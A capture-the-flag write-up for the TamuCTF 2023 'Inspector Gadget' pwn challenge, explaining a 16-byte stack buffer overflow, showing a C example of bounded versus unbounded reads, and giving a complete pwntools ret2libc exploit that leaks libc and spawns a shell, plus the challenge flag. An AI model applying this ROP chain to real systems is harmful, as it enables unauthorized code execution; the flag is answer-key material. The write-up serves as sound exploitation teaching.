Tamu CTF 2023 - Inspector Gadget (pwn, rop)

Inspector Gadget gave me this binary with one goal. pwn.
Author: _mac_

  • [128 solves / 339 points]

Yes! I got first blood!!

Analysis

The challenge binary and a libc file were provided.

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
char buf[16]; // [rsp+0h] [rbp-10h]

read(0, buf, 0x60uLL); // reads up to 0x60 bytes into a 16-byte stack buffer, so saved rbp and the return address can be overwritten
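The bug class behind the challenge, with a bounded version of the read beside it, as an added example in C (not part of the original writeup or the challenge source). The function names and the pipe-based self-check are this example's own.

```c
// Added example (not from the writeup): a fixed-size stack buffer filled by an
// oversized read(), next to a bounded version. Names are this example's own.
#include <stddef.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 16     /* char buf[16] at [rbp-0x10] in the challenge binary */
#define READ_MAX 0x60   /* the length the challenge passes to read() */

/* Mirrors the challenge: asks read() for 0x60 bytes into a 16-byte buffer.
   With no canary, bytes past buf[15] land on saved rbp and the return address.
   Kept only to contrast with the bounded version below; never called here. */
ssize_t read_unbounded(int fd, char *buf /* BUF_SIZE bytes */)
{
    return read(fd, buf, READ_MAX);       /* BUG: length not tied to the buffer */
}

/* Hardened: the read length is derived from the destination size, one byte is
   reserved for a terminator, and the byte count actually read is returned. */
ssize_t read_bounded(int fd, char *buf, size_t cap)
{
    if (cap == 0)
        return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return n;
}

/* Self-check (this example's own): pipe input_len bytes of 'A' into a BUF_SIZE
   buffer followed by a zeroed guard region. Returns the byte count read, or -1
   if the guard was written to or the terminator is missing. */
ssize_t bounded_read_check(size_t input_len)
{
    int fds[2];
    char input[READ_MAX];
    if (input_len > sizeof(input) || pipe(fds) != 0)
        return -1;
    memset(input, 'A', input_len);
    if (write(fds[1], input, input_len) != (ssize_t)input_len)
        return -1;
    close(fds[1]);                        /* writer closed: reader sees EOF */

    struct { char buf[BUF_SIZE]; char guard[READ_MAX]; } frame;
    memset(&frame, 0, sizeof(frame));
    ssize_t n = read_bounded(fds[0], frame.buf, sizeof(frame.buf));
    close(fds[0]);
    if (n < 0 || frame.buf[n] != '\0')
        return -1;
    for (size_t i = 0; i < sizeof(frame.guard); i++)
        if (frame.guard[i] != 0)
            return -1;                    /* overflowed past the buffer */
    return n;
}
```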

Solve

I think this is the textbook example of 64-bit ROP: leak a libc address through puts, return to main, then call system("/bin/sh").

Exploit Code

from pwn import *

context.arch = 'amd64'
context.log_level = 'DEBUG'

p = remote("tamuctf.com", 443, ssl=True, sni="inspector-gadget")
# p = process('./inspector-gadget')
e = ELF('./inspector-gadget')
libc = ELF('./libc.so.6')

pop_rdi = 0x40127b  # pop rdi; ret
ret = 0x401016      # ret, used to keep the stack 16-byte aligned before system

# Stage 1: overwrite the return address, leak puts@GOT with puts@PLT, return to main
payload = b''
payload += b'A' * (0x10 + 0x8)  # 16-byte buf + saved rbp
payload += p64(pop_rdi)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(e.sym['main'])

p.sendline(payload)

# puts prints the 6 significant bytes of the libc address; rebase libc from it
libc.address = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym['puts']
info(hex(libc.address))

# Stage 2: same overflow, now calling system("/bin/sh") in the rebased libc
payload = b''
payload += b'A' * (0x10+0x8)
payload += p64(pop_rdi)
payload += p64(next(libc.search(b'/bin/sh\x00')))
payload += p64(ret) # ret
payload += p64(libc.sym['system'])

pause()
p.sendline(payload)

p.interactive()

Flag

gigem{ret2libc_r0p_g04t3d}